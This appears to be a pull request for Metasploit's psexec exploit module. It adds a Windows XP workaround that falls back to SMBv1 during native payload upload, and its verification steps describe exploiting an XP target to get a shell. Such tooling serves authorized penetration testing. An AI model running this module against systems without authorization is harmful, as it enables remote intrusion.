### PR TITLE
avoid using SMBv2 on Windows XP Native Upload targets

### DIFF
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -86,12 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
   end
 
+  def native_upload_with_workaround
+    # Avoid implementing NTLMSSP on Windows XP
+    # http://seclists.org/metasploit/2009/q1/6
+    if smb_peer_os == "Windows 5.1"
+      connect(versions: [1])
+      smb_login
+    end
+    native_upload(datastore['SHARE'])
+  end
+
   def exploit
     print_status("Connecting to the server...")
-    connect(versions: [1,2])
+    connect(versions: [2,1])
 
     print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
-    smb_login()
+    smb_login
 
     if not simple.client.auth_user and not datastore['ALLOW_GUEST']
       print_line(" ")
@@ -117,12 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote
         execute_powershell_payload
       else
         print_status('Selecting native target')
-        native_upload(datastore['SHARE'])
+        native_upload_with_workaround
       end
     when 'PowerShell'
       execute_powershell_payload
     when 'Native upload'
-      native_upload(datastore['SHARE'])
+      native_upload_with_workaround
     when 'MOF upload'
       mof_upload(datastore['SHARE'])
     end


### PR DESCRIPTION
Per this handy posting to the Metasploit mailing list from 2009 (http://seclists.org/metasploit/2009/q1/6), it appears that Windows XP is an oddball for PSExec with SMBv2 in that it requires an esoteric and already-removed protocol for DCERPC authentication. Rather than implement this for XP, just switch back to SMBv1 as needed.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/psexec`
- [x] Exploit a Windows XP target
- [x] **Verify** that you get a shell
